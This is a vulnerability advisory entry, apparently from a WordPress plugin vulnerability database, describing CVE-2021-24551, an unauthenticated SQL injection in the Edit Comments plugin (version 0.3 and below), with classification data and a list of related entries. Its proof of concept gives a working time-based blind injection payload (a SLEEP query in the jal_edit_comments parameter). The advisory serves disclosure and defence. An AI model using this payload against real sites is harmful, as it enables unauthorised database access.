WordPress Plugin Vulnerabilities

Edit Comments <= 0.3 - Unauthenticated SQL Injection

Description

The plugin does not sanitise, validate or escape the jal_edit_comments GET parameter before using it in a SQL statement, leading to a SQL injection issue

Proof of Concept

Post a comment on a page, then open https://example.com/<post-page>/?jal_edit_comments=7%20AND%20(SELECT%209114%20FROM (SELECT(SLEEP(5)))wjzD)

Affects Plugins

Plugin icon
edit-comments
No known fix

References

CVE
CVE-2021-24551
URL
https://codevigilant.com/disclosure/2021/wp-plugin-edit-comments/

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
7.2 (high)

Miscellaneous

Original Researcher
Shreya Pohekar of Codevigilant Project
Verified
Yes
WPVDB ID
e62fb8db-384f-4384-ad24-e10eb9058ed5

Timeline

Publicly Published
2021-07-24 (about 2 years ago)
Added
2021-07-24 (about 2 years ago)
Last Updated
2022-02-24 (about 2 years ago)

Other

Published
Title
Published
2014-08-01
Title
Simple Press - SQL Injection
Published
2014-08-01
Title
Simple Login Log - SQL Injection
Published
2014-08-01
Title
Participants Database < 1.5.4.9 - Unauthenticated SQL Injection
Published
2024-01-16
Title
Burst Statistics Really Simple Plugins < 1.5.4 - Editor+ SQL Injection
Published
2011-07-20
Title
Social Slider < 7.4.2 - SQL Injection